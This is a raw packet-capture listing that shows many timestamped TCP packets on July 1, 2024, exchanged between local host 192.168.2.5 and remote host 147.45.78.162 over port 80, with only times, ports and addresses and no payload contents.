Jul 1, 2024 13:02:14.303097010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.303132057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.303168058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.303168058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.303272009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.303292036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.303383112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.304882050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.304939985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.304953098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.304965973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.305049896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.305061102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.305073023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.305078030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.305084944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.305111885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.305427074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308641911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308696985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308711052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308808088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308808088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308852911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308864117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308873892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308886051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.308902979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308902979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308933973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.308933973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.323833942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.323910952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.323923111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.323966026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.323995113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324027061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324084044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324095011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324105024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324115992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324160099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324160099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324289083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324301958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324314117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324381113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324381113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324493885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324503899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324515104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324527979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.324542046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324553013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324553013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324577093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.324701071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.325002909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.349102974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349136114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349145889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349160910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.349268913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.349276066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349287033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349297047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349307060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349328995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.349471092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.349493027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.349626064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.353349924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353406906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.353492975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353503942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353517056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353526115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353559017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353564978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.353564978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.353571892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.353598118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.353655100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.357688904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357723951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357733965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357750893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.357822895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357841015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.357918024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357928991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357939005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.357944012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.358000994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.358000994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.369402885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369534969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369549036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369577885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.369638920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.369685888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369699001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369709015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369721889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.369798899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.372546911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372580051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372590065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372709036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372720003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372730970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372739077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.372742891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372778893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.372778893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.372921944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.372952938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.373050928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.377717018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377752066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377763987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377819061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.377820015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377819061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.377831936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377888918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.377888918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.377928019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377939939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.377981901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.378073931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.385113955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385142088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385152102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385179996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.385246992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385257959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385268927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385272980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.385314941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.385314941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.385473967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385484934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.385822058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.386625051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386660099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386671066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386688948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.386785030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.386853933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386866093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386877060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386904955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.386984110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.386986971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.388046026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.393568993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393599033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393610001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393672943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.393672943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.393749952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393760920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393773079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393821001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.393821001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.393985987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.393997908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394009113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394020081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394031048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394043922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394043922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394093990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394093990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394370079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394382954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394481897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394493103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394503117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394507885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394532919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394545078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394546032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394546032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394555092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394567013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394577980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.394582987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394582987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394603968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.394701958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.399672031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399749041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399763107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399777889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.399857044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.399888992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399900913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399914026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399924040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399935961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.399950981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.400043964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.400217056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400228977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400242090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400252104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400341034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.400341034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.400470018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400490046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.400533915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.400787115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.403666019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403681040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403691053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403716087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403728008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403748035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.403881073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403892040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403903008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.403911114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.403930902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.403974056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.418929100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.418942928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.418955088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419053078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419064045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419075012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419083118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419104099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419269085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419286013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419297934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419298887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419307947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419318914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419325113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419331074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419341087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419348001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419365883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419445038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.419694901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.419908047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.645976067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.645992041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646079063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646121025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646132946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646145105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646188974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646188974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646373034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646385908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646399975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646409988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646423101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646434069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646445990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646450043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646497011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646497011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646727085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646739960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646750927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646760941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646771908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646780014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646784067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646795988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646809101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646812916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646812916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646821022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646832943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646843910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646845102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646856070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646867990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646867990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646879911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.646887064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.646908998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647039890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647564888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647579908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647592068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647603035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647615910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647615910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647623062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647634029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647645950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647649050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647656918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647659063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647669077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647680998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647692919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647696018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647705078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647716999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647727013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647727013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647728920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.647789001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.647789001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648535967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648549080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648561001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648571968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648597002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648600101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648601055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648616076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648627043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648638010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648646116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648648977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648660898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648662090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648673058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648684025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648685932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648695946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.648721933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.648796082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649518967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649533033 CEST	80	49705	147.45.78.162	192.168.2.5
